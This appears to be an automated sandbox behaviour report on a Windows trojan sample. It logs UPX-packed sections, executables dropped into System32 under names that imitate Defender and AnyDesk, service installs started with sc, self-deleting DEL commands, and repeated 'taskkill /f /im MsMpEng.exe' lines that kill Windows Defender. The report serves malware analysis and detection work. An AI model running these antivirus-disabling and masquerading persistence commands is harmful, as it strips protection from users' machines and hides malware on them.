Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeExecutable created and started: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeExecutable created and started: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeJump to behavior
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exeJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\AnyDeskShellIntegration_Update.dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\AnyDeskShellIntegration.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\AnyDeskUpdateService.exeJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\AnyDeskShellIntegration_Update.dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\AnyDeskShellIntegration.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\AnyDeskUpdateService.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7852840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,0_2_00007FF6C7852840
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeWindow / User API: threadDelayed 7823Jump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeWindow / User API: threadDelayed 2175Jump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeWindow / User API: threadDelayed 372
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeWindow / User API: threadDelayed 7704
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeWindow / User API: threadDelayed 2294
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeDropped PE file which has not been started: C:\Windows\System32\AnyDeskShellIntegration_Update.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeDropped PE file which has not been started: C:\Windows\System32\AnyDeskShellIntegration.dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeDropped PE file which has not been started: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dllJump to dropped file
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeAPI coverage: 9.4 %
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe TID: 5064Thread sleep time: -85000s >= -30000sJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 6564Thread sleep time: -782300s >= -30000sJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 6564Thread sleep time: -217500s >= -30000sJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe TID: 3704Thread sleep count: 372 > 30
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe TID: 3704Thread sleep time: -1116000s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448Thread sleep count: 7704 > 30
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448Thread sleep time: -770400s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448Thread sleep count: 2294 > 30
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448Thread sleep time: -229400s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeLast function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78832B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6C78832B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A9B94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF76E1A9B94
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9590E0 FindFirstFileExW,7_2_00007FF7AA9590E0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB32B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_00007FF71DDB32B4
Source: MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2168899269.000002466387E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD0
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209F6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C787478C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7887C50 GetProcessHeap,0_2_00007FF6C7887C50
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C787478C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78685D4 SetUnhandledExceptionFilter,0_2_00007FF6C78685D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7868430 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C7868430
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19C0F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF76E19C0F8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E191484 SetUnhandledExceptionFilter,5_2_00007FF76E191484
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1912E0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF76E1912E0
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA952FB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7AA952FB4
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA953194 SetUnhandledExceptionFilter,7_2_00007FF7AA953194
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA956964 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7AA956964
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD985D4 SetUnhandledExceptionFilter,25_2_00007FF71DD985D4
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00007FF71DDA478C
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDC0188 SetUnhandledExceptionFilter,25_2_00007FF71DDC0188
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD98430 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00007FF71DD98430

HIPS / PFW / Operating System Protection Evasion

barindex
Excessive usage of taskkill to terminate processes
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Uses taskkill to terminate AV processes
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exeJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" installJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
